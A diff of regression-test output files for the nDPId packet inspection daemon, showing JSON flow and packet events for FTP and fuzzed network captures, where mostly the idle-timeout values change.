00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","packets-captured":1192,"packets-processed":1192,"total-skipped-flows":0,"total-l4-data-len":1050844,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1552590243371}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 1192/1192

12
test/results/ftp_failed.pcap.out
View File

@@ -1,11 +1,11 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp_failed.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1574361625864}
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574361625864,"flow_last_seen":1574361625864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1574361625864,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="}
00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}}
00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574361625864,"flow_last_seen":1574361625864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1574361625864,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="}
00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}}
00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":18,"total-skipped-flows":0,"total-l4-data-len":136,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1574361633102}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 18/18

170
test/results/fuzz-2006-06-26-2594.pcap.out
View File

@@ -66,15 +66,15 @@
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1120469595096,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120469595096,"pkt":"3\/\/\/\/\/\/\/AODtAW69CABFAADlaaMAAIARTBPAqAECwKgB+wCKAIoA0VtoEQ6E7MCoAQIAigC7AACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaVAAIAGJpHAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaaZAADgGJpDAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaadAAIAGJo\/AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469620579,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaahAAIAGJo7AqAFHk4kVegqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaVAAIAGJpHAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaaZAADgGJpDAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaadAAIAGJo\/AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469620579,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaahAAIAGJo7AqAFHk4kVegqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1120469632829,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1120469632829,"pkt":"ADBUADRWAODtAW69CABFAAA9aaoAAIARTbLAcgECwKgBAQqfADUAKUpe7dQBAAABgAAAUgAAA2Z0cAdlY2l0ZexlA2NvbQAAAQAB"}
00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -83,62 +83,62 @@
00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1120469634840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1120469634840,"pkt":"AODtAW69ADBUADRWCABFAACaAABAAEARtv\/AqAEBwKgBAgA1Cp8Ahtfh7dSBgAABAAKzAgABA2Z0cLxlY2l0ZexlA2NvbQAAAQABwAwABQABAAAC9QAGA2Ruc8AQwC0AAQABAAAAIQAEk+oB\/cAQAAIAAQAAA0MAEQJucwViYXJhawNuZXQCaWwAwBAAAgABAAADQwACwC3ATwABAGoAAAARAATUljCp"}
